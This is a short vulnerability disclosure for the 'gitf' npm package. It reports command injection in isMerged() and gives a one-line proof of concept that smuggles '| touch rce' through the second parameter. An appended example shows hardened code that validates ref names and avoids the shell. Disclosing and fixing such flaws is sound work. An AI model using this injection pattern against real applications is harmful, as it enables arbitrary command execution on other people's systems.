Hi,
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method isMerged() fails to sanitize its 2nd parameter and lets it flow into a sensitive command execution API.
Here is the proof of concept.
```javascript
const lib = require('gitf');
var gitf = new lib();
gitf.isMerged("", "| touch rce", () => {}); // a file named rce will be created
```
Please consider fixing it. Thanks!
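
Added example, not part of the original report and not gitf's own code: one way to close this class of bug is to validate ref names and pass them to git as an argument vector, so no shell ever parses the second parameter. The function names (`isSafeRef`, `buildIsMergedArgs`, `isMergedSafe`) are hypothetical, and the use of `git merge-base --is-ancestor` is an assumption, since the report does not show which git command `isMerged()` runs.

```javascript
// Added example: hardened merge check. All names are hypothetical, not gitf's API.
const { execFile } = require('node:child_process');

// Conservative subset of the rules enforced by `git check-ref-format`.
function isSafeRef(name) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 255) return false;
  if (name.startsWith('-')) return false;               // would be parsed as a git option
  if (!/^[A-Za-z0-9._\/-]+$/.test(name)) return false;  // rejects spaces, |, ;, $, `, etc.
  if (name.includes('..') || name.includes('//')) return false;
  if (name.startsWith('/') || name.endsWith('/') || name.endsWith('.')) return false;
  if (name.split('/').some((p) => p.startsWith('.') || p.endsWith('.lock'))) return false;
  return true;
}

// Builds the argv for git; throws before any process is spawned if a ref is unsafe.
function buildIsMergedArgs(branch, target) {
  for (const ref of [branch, target]) {
    if (!isSafeRef(ref)) throw new TypeError(`invalid ref name: ${JSON.stringify(ref)}`);
  }
  return ['merge-base', '--is-ancestor', branch, target];
}

// cb(err, merged): merged is true when `branch` is an ancestor of `target`.
function isMergedSafe(branch, target, cb, cwd = process.cwd()) {
  let args;
  try {
    args = buildIsMergedArgs(branch, target);
  } catch (e) {
    return cb(e);
  }
  // execFile hands argv straight to git; no shell interprets the values.
  execFile('git', args, { cwd, shell: false }, (err) => {
    if (!err) return cb(null, true);
    if (err.code === 1) return cb(null, false); // exit status 1: not an ancestor
    cb(err);                                    // git missing, bad repo, unknown ref
  });
}
```

With this check, the input from the proof of concept is rejected in `buildIsMergedArgs` and no child process is started.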